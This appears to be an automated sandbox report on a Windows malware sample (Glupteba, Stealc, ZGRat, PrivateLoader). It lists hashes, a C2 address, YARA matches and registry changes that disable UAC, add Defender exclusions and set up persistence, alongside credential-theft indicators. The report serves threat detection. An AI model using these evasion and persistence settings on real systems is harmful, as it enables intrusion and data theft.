glupteba | 15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126

Analysis

max time kernel
299s
max time network
300s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
06-05-2024 22:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe
Size

410KB
MD5

b76b8463d2167fa7f1feb1d562fe18ac
SHA1

9870f08014840f890ef57200a87775d5d199cb5f
SHA256

15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126
SHA512

c137dcebc7ea2da5a90898c73ddbf54370d168d7655acffa4cae62586b53e7064871d10b39af363b664529bb39fb60ae895ad61f2ed766f7390a874dbcf01361
SSDEEP

12288:IpUaCbA1fQy08IAKsVU5kTc9E4rQQm+7fLiEivqUa:I1CbAP0zAr1TEE4r0+6pCUa

Score

10^/10

glupteba privateloader stealc zgrat discovery dropper evasion execution loader persistence rat rootkit spyware stealer themida trojan upx

Malware Config

Extracted

Family

stealc

http://185.172.128.150

Attributes

url_path
/c698e1bc8a2f5e6d.php

Signatures

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral2/memory/6128-4936-0x000001ACC50F0000-0x000001ACC8924000-memory.dmp	family_zgrat_v1
behavioral2/memory/6128-4941-0x000001ACE2E90000-0x000001ACE2EB4000-memory.dmp	family_zgrat_v1
behavioral2/memory/6128-4937-0x000001ACE3200000-0x000001ACE330A000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 18 IoCs

resource	yara_rule
behavioral2/memory/2616-1224-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/1952-1245-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/2284-1254-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/4720-1256-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5464-3251-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5368-3250-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5656-3258-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5520-3252-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5368-3722-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5656-4206-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5520-4209-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/5464-4213-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/1140-4924-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/1140-4973-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/1140-5001-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/1140-5173-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/1140-5254-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba
behavioral2/memory/1140-5297-0x0000000000400000-0x0000000001DF3000-memory.dmp	family_glupteba

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	1PuMPEzZvab5azK7IQYu0T4l.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe

Windows security bypass 2 TTPs 10 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\5vIOb5zhVQZLutv70Z4zhxHI.exe = "0"	5vIOb5zhVQZLutv70Z4zhxHI.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	KILAV28QqdA8TFWpDnxeBfib.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	KILAV28QqdA8TFWpDnxeBfib.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\mrWPwq1DxmIkQjCy6MM3QmVj.exe = "0"	mrWPwq1DxmIkQjCy6MM3QmVj.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	KILAV28QqdA8TFWpDnxeBfib.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\KILAV28QqdA8TFWpDnxeBfib.exe = "0"	KILAV28QqdA8TFWpDnxeBfib.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\JRpWeu51EJ6KH6Z1tFk6l5IW.exe = "0"	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	KILAV28QqdA8TFWpDnxeBfib.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	KILAV28QqdA8TFWpDnxeBfib.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	KILAV28QqdA8TFWpDnxeBfib.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1PuMPEzZvab5azK7IQYu0T4l.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
44	5140	u3wc.1.exe
49	5140	u3wc.1.exe
96	5020	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 34 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3192	powershell.exe
4212	powershell.exe
6100	powershell.exe
5844	powershell.exe
5464	powershell.exe
5636	powershell.exe
2492	powershell.EXE
4888	powershell.exe
5592	powershell.exe
1224	powershell.exe
1648	powershell.exe
2864	powershell.exe
5736	powershell.exe
3052	powershell.exe
4740	powershell.exe
2992	powershell.exe
5972	powershell.exe
4548	powershell.exe
2148	powershell.exe
1464	powershell.exe
4724	powershell.exe
708	powershell.exe
2288	powershell.exe
1680	powershell.exe
4832	powershell.exe
5948	powershell.exe
5804	powershell.exe
3728	powershell.exe
5856	powershell.exe
596	powershell.exe
5664	powershell.exe
4224	powershell.exe
5792	powershell.exe
5920	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3248	netsh.exe
4588	netsh.exe
6128	netsh.exe
5128	netsh.exe

Checks BIOS information in registry 2 TTPs 5 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1PuMPEzZvab5azK7IQYu0T4l.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1PuMPEzZvab5azK7IQYu0T4l.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation	GIjqVmx.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation	OfDMGxv.exe

Drops startup file 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3pCMsLNAWwrBCgcTkPc4SRRY.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HpotgPt5OK9fNQDEqAOlV4JJ.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\28N4S30zYx6sRg2Ab4nsZHSv.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5lZaXf5ItWeUX97HBLk6SQCf.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\i7pwUytojuOiXdI3uPS0VL8N.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0aGPlBlNITzWrqPNKjKpTWtW.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yNz3b3yHnAGK23tPw5d9Y5Ed.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FewC3ghiUJmLYUsrgzhwfqgH.bat	msbuild.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bMh3BVAyU2ucA6OEI3JD1vF2.bat	msbuild.exe

Executes dropped EXE 27 IoCs

pid	Process
5052	XTz0VIeuIV1rlz8hoaYk7Ojd.exe
2616	KILAV28QqdA8TFWpDnxeBfib.exe
2284	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
1952	5vIOb5zhVQZLutv70Z4zhxHI.exe
4720	mrWPwq1DxmIkQjCy6MM3QmVj.exe
1700	u3wc.0.exe
5368	KILAV28QqdA8TFWpDnxeBfib.exe
5464	5vIOb5zhVQZLutv70Z4zhxHI.exe
5520	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
5656	mrWPwq1DxmIkQjCy6MM3QmVj.exe
5140	u3wc.1.exe
1140	csrss.exe
5608	injector.exe
3228	windefender.exe
1768	windefender.exe
2120	1PuMPEzZvab5azK7IQYu0T4l.exe
968	fGxiDSgCK5ZMR2r1HvJRYj2m.exe
2112	Install.exe
6116	QHoyiZsDHaITbf2s6lih98yW.exe
2736	Install.exe
5780	Install.exe
5256	Install.exe
5160	OfDMGxv.exe
708	GIjqVmx.exe
3752	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
3516	713674d5e968cbe2102394be0b2bae6f.exe
5236	1bf850b4d9587c1017a75a47680584c4.exe

Loads dropped DLL 3 IoCs

pid	Process
1700	u3wc.0.exe
1700	u3wc.0.exe
5020	rundll32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000800000001ac41-4980.dat	themida
behavioral2/files/0x000800000001ac41-4979.dat	themida

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a00000001ac3c-4967.dat	upx
behavioral2/memory/3228-4971-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/1768-5155-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	KILAV28QqdA8TFWpDnxeBfib.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	KILAV28QqdA8TFWpDnxeBfib.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	KILAV28QqdA8TFWpDnxeBfib.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\mrWPwq1DxmIkQjCy6MM3QmVj.exe = "0"	mrWPwq1DxmIkQjCy6MM3QmVj.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\JRpWeu51EJ6KH6Z1tFk6l5IW.exe = "0"	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	KILAV28QqdA8TFWpDnxeBfib.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	KILAV28QqdA8TFWpDnxeBfib.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	KILAV28QqdA8TFWpDnxeBfib.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\KILAV28QqdA8TFWpDnxeBfib.exe = "0"	KILAV28QqdA8TFWpDnxeBfib.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\5vIOb5zhVQZLutv70Z4zhxHI.exe = "0"	5vIOb5zhVQZLutv70Z4zhxHI.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	5vIOb5zhVQZLutv70Z4zhxHI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	KILAV28QqdA8TFWpDnxeBfib.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	mrWPwq1DxmIkQjCy6MM3QmVj.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	JRpWeu51EJ6KH6Z1tFk6l5IW.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1PuMPEzZvab5azK7IQYu0T4l.exe

Drops Chrome extension 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	GIjqVmx.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	GIjqVmx.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	OfDMGxv.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	Install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
3	pastebin.com
5	pastebin.com

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 63 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	1PuMPEzZvab5azK7IQYu0T4l.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	1PuMPEzZvab5azK7IQYu0T4l.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy	1PuMPEzZvab5azK7IQYu0T4l.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	GIjqVmx.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	GIjqVmx.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15	GIjqVmx.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	OfDMGxv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	GIjqVmx.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	OfDMGxv.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA	GIjqVmx.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	1PuMPEzZvab5azK7IQYu0T4l.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719	GIjqVmx.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	GIjqVmx.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2120	1PuMPEzZvab5azK7IQYu0T4l.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1104 set thread context of 376	1104	15e4e2d3998c5c604f37df003c4d15726eecf9bbee2a63ab33ac6a0cc0289126.exe	77

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 4 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	5vIOb5zhVQZLutv70Z4zhxHI.exe
File opened (read-only)	\??\VBoxMiniRdrDN	JRpWeu51EJ6KH6Z1tFk6l5IW.exe
File opened (read-only)	\??\VBoxMiniRdrDN	KILAV28QqdA8TFWpDnxeBfib.exe
File opened (read-only)	\??\VBoxMiniRdrDN	mrWPwq1DxmIkQjCy6MM3QmVj.exe

Drops file in Program Files directory 24 IoCs

description	ioc	Process
File created	C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi	OfDMGxv.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	GIjqVmx.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\YLGCgxWSMiScZ.dll	GIjqVmx.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\FlzFRvO.xml	GIjqVmx.exe
File created	C:\Program Files (x86)\PZjcxajBIsNTC\vUabUqj.dll	GIjqVmx.exe
File created	C:\Program Files (x86)\DQANlvmTAvZU2\PYQuaFxyOZVFx.dll	OfDMGxv.exe
